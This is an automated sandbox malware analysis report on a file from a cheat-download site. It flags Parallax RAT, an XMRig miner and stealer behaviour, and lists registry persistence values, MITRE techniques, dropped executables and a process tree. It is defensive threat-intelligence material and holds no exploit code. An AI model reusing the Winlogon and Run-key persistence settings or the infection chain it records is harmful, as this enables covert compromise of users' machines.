parallax | hxxps://cheats4pro[.]com/download

Analysis

max time kernel
234s
max time network
293s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
14/05/2023, 19:23

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://cheats4pro.com/download

Score

10^/10

parallax xmrig evasion miner persistence rat spyware stealer

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Security\\AdvancedDefender.exe\","	C4PROLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Security\\AdvancedDefender.exe\","	AdvancedDefender.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Security\\AdvancedDefender.exe\","	C4PROLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Security\\AdvancedDefender.exe\","	AdvancedDefender.exe

ParallaxRat
ParallaxRat is a multipurpose RAT written in MASM.
rat parallax

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 716 created 3296	716	AppLaunch.exe	24
PID 716 created 3296	716	AppLaunch.exe	24
PID 716 created 3296	716	AppLaunch.exe	24
PID 716 created 3296	716	AppLaunch.exe	24
PID 3356 created 4512	3356	svchost.exe	19
PID 3356 created 2524	3356	svchost.exe	21
PID 2656 created 3296	2656	AppLaunch.exe	24
PID 2656 created 3296	2656	AppLaunch.exe	24
PID 2656 created 3296	2656	AppLaunch.exe	24

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/848-1491-0x0000021C9D780000-0x0000021C9DF6F000-memory.dmp	xmrig
behavioral1/memory/848-1513-0x0000021C9D780000-0x0000021C9DF6F000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

flow	pid	Process
105	668	powershell.exe
107	668	powershell.exe
110	668	powershell.exe
129	4872	powershell.exe
131	4872	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	AppLaunch.exe
File created	C:\Windows\System32\drivers\etc\hosts	AppLaunch.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 11 IoCs

pid	Process
4148	C4PROLauncher.exe
2968	1.exe
2648	C4Loader.exe
5104	AdvancedDefender.exe
2200	SysApp.exe
3764	C4PROLauncher.exe
3592	1.exe
4084	C4Loader.exe
1188	AdvancedDefender.exe
440	SysApp.exe
2648	fodhelper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 5104 set thread context of 716	5104	AdvancedDefender.exe	104
PID 716 set thread context of 1956	716	AppLaunch.exe	116
PID 716 set thread context of 848	716	AppLaunch.exe	117
PID 1188 set thread context of 2656	1188	AdvancedDefender.exe	136
PID 2656 set thread context of 4124	2656	AppLaunch.exe	148

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
444	sc.exe
4952	sc.exe
1784	sc.exe
4784	sc.exe
1660	sc.exe
2584	sc.exe
800	sc.exe
2008	sc.exe
2980	sc.exe
2180	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
164	2524	WerFault.exe	21
4304	4512	WerFault.exe	19

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
984	schtasks.exe
2604	schtasks.exe
4520	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133285730150016545"	chrome.exe

Modifies registry class 38 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "650"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "250"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1050"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294935296"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "50"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2540	chrome.exe
2540	chrome.exe
3876	powershell.exe
3876	powershell.exe
668	powershell.exe
668	powershell.exe
3876	powershell.exe
668	powershell.exe
3580	powershell.exe
3580	powershell.exe
5104	AdvancedDefender.exe
3580	powershell.exe
716	AppLaunch.exe
716	AppLaunch.exe
4768	powershell.exe
2808	chrome.exe
2808	chrome.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
2200	SysApp.exe
716	AppLaunch.exe
716	AppLaunch.exe
716	AppLaunch.exe
716	AppLaunch.exe
1956	dialer.exe
1956	dialer.exe
716	AppLaunch.exe
716	AppLaunch.exe
1956	dialer.exe
1956	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
848	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
1956	dialer.exe
848	dialer.exe
848	dialer.exe
4304	WerFault.exe
4304	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3296	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe
Token: SeShutdownPrivilege	2540	chrome.exe
Token: SeCreatePagefilePrivilege	2540	chrome.exe

Suspicious use of FindShellTrayWindow 50 IoCs

pid	Process
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2944	7zG.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe
2540	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1736	Conhost.exe
1756	Conhost.exe
2968	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 2592	2540	chrome.exe	66
PID 2540 wrote to memory of 2592	2540	chrome.exe	66
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 2796	2540	chrome.exe	68
PID 2540 wrote to memory of 4160	2540	chrome.exe	69
PID 2540 wrote to memory of 4160	2540	chrome.exe	69
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70
PID 2540 wrote to memory of 4792	2540	chrome.exe	70

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:660

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:576
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2236

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4512
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4512 -s 800
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:4304

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2524
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2524 -s 864
  2⤵
  - Program crash
  PID:164

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3820

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cheats4pro.com/download
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa870e9758,0x7ffa870e9768,0x7ffa870e9778
    3⤵
    PID:2592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1732,i,18268270093730465290,17718310205085392215,131072 /prefetch:2
    3⤵
    PID:2796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
